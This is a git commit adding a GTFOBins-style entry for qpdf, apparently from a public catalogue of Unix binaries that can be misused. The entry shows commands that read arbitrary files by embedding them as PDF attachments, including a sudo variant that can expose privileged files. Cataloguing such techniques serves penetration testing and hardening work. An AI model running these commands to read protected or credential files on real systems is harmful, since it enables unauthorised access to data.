qpdf file-read

This commit is contained in:
Ryan Cartner 2024-04-12 12:33:45 -03:00
parent 97f46f1526
commit 4999f2d8a0

9
_gtfobins/qpdf.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
file-read:
- code: |
qpdf --empty --add-attachment /path/filename -- out.pdf; qpdf out.pdf --show-attachment=filename
sudo:
- code: |
sudo qpdf --empty --add-attachment /path/filename -- out.pdf; qpdf out.pdf --show-attachment=filename
---